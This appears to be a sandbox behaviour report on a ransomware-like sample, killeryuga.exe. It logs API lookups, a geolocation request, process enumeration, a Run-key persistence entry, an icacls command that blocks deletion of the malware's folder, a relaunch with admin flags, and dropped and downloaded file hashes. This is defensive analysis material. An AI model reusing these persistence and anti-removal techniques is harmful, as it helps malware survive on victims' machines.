Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x75220000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x75223eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x75223ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x75225dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x75224af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x75223e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x75223f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x75224642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x7522fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x74af0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74af9263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x75bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x75bc311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x75bd7673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x75bcb131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x74a90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x74a9436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x74aa572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749ec544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:15 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 15394848052 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75140000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a True 1
Fn
File Delete filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe False 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, size = 218, type = REG_EXPAND_SZ True 1
Fn
Process Create process_name = icacls, os_pid = 0x98c, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:29 (UTC) True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, show_window = SW_SHOW True 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #3: icacls.exe
0 0
»
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x98c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 990
0x 994
Process #4: taskeng.exe
0 0
»
Information Value
ID #4
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:53, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:18, Reason: Self Terminated
Monitor Duration 00:00:25
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x50c
Parent PID 0x36c (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 97C
0x 578
0x 574
0x 520
0x 514
0x 510
Process #5: killeryuga.exe
2147 153
»
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:53, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:25
OS Process Information
»
Information Value
PID 0x99c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9A0
0x 9A8
0x 9AC
0x 9B0
0x 9B4
0x 9B8
0x 9BC
0x 9C0
0x 9C4
0x 9C8
0x 9CC
0x 9E0
0x 9E4
0x 9E8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x00984028 0x009B338E Marked Executable - 32-bit - False
...
buffer 0x00984028 0x009B338E Content Changed - 32-bit 0x00984028 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\_readme.txt 1.08 KB MD5: a8d93f8169180c8bd8e1520498934801
SHA1: 5203d1601739402e0d9ba9301fc9c96c90837953
SHA256: 6b9cef14ba78d273cddb4f9d6d1dc894077753da29a8d77ef93d1f5c743fb453
SSDeep: 24:FS2zmHPnIekFQjhRe9bgnYLuWa1mFRqrl3W4kA+GTCkF5M2/k6gJ4Id:DzmHfv0p6WmPFWrDGTFf/kJLd 		False
...
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE 		False
...
5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf 		False
...
079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21 153.00 KB MD5: 36185c10c8ccb627648067c8dc5d7e03
SHA1: 9b2435350859250371e00cd52a998f120724e088
SHA256: 079f5422ec8e2d956f0533a2a1a62c0658453dbc2f1db0621f3b175ed2e46a21
SSDeep: 3072:sSfsyx3qXC9zdmPTN1VVsTxKjW4jC5ELiOdBA:sSRxECkWKq 		False
...
114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK 		False
...
206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20 0.10 KB MD5: bc8dc0185fcf6d2975580c74babacf62
SHA1: 5ffe7319affbbd31ad56f10098ee70b0467a2bda
SHA256: 206ea70ae672dafb87cb97ba0c95eec21873fcc91d1698cdd66b08e065cbbb20
SSDeep: 3:YJMLAA9IIOIKdv/1jETnOnJ/H9PQhiSd/6mgdn82FYn:YIzIfIm+OJP9ohiSd65n82in 		False
...
Threads
Thread 0x9a0
636 7
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
